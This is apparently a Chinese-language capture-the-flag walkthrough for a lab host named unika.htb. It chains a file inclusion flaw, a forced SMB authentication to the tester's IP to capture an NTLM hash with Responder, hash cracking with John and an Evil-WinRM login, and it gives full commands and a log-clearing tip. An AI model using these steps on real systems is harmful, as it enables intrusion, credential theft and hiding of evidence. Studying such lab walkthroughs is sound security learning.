从LFI到域控：一次5985端口WinRM的完整渗透路径剖析

1. 从5985端口开始的侦察之旅第一次看到5985端口开放WinRM服务时我就像发现了新大陆。这个端口在Windows系统中就像一扇隐藏的后门但很多人对它视而不见。记得去年做内网渗透时十台服务器里有六台都开着这个端口管理员却总以为默认配置就是安全的。用Nmap扫描目标时我习惯加上这几个关键参数nmap -v -p- --min-rate 5000 -sV -sC 10.129.136.91--min-rate 5000让扫描速度飞起来-sV能识别服务指纹-sC自动跑默认脚本扫描结果显示出经典的Windows服务组合80端口的Apache和5985端口的WinRM。最有趣的是发现网站重定向到unika.htb这个域名这时候就需要在/etc/hosts里加条记录echo 10.129.136.91 unika.htb | sudo tee -a /etc/hosts2. 突破点LFI漏洞的深度利用那个看似无害的index.php?page参数成了整个渗透链条的起点。LFI漏洞就像是你让服务员上菜结果他连厨房钥匙都给你了。我见过太多开发犯这个错误——直接把用户输入拼接到文件路径里。测试LFI时我有个习惯性payloadhttp://unika.htb/index.php?page../../../../../../../../windows/system32/drivers/etc/hosts这个路径穿越能读到系统文件已经算幸运了更妙的是Windows系统对SMB协议的特殊处理。当你尝试包含//10.10.14.7/somefile这样的SMB路径时系统会傻乎乎地发起NTLM认证。3. Responder的魔法时刻配置Responder前有三件事必须检查确认Responder.conf里SMB On确保tun0网卡IP正确关闭可能冲突的Samba服务启动命令简单但威力巨大python3 Responder.py -I tun0当目标系统尝试认证时Responder会截获NetNTLMv2哈希。这个哈希虽然不能直接还原密码但就像拿到了密码的指纹。我习惯把抓到的哈希保存为hash.txt格式类似Administrator::WINRM:1122334455667788:AAAAABBBBBCCCCCDDDDDEEEEEFFFFF:0101000000000000ABCDEF01234567894. 哈希破解的艺术John the Ripper是我的老伙计了但用对字典很重要。rockyou.txt虽然经典但在企业环境我更喜欢用定制字典。破解命令简单粗暴john --wordlist/usr/share/wordlists/rockyou.txt hash.txt如果运气好或者说管理员密码设得太烂很快就能看到类似这样的输出badminton (Administrator)这时候心跳都会加速——因为你知道离拿下系统只差一步了。5. Evil-WinRM的终极一击拿到凭证后Evil-WinRM就像一把万能钥匙。我特别喜欢它的几个功能文件上传/下载内存执行绕过杀软完整的PowerShell功能连接命令看着简单evil-winrm -i 10.129.136.91 -u Administrator -p badminton但第一次看到那个PS提示符跳出来时那种成就感难以形容。记得有次在实战中就这样拿到了域管的shell整个内网尽在掌握。6. 渗透后的清理与思考每次测试完我都会做两件事清理日志特别是Security和WinRM操作日志检查持久化看是否有其他团队留下的后门这条攻击链最让我感慨的是从web漏洞到域控中间每个环节都是管理员可以防范的。比如关闭不必要的WinRM服务或者给SMB访问加上IP白名单。但现实是这些基础防护在很多企业仍然缺失。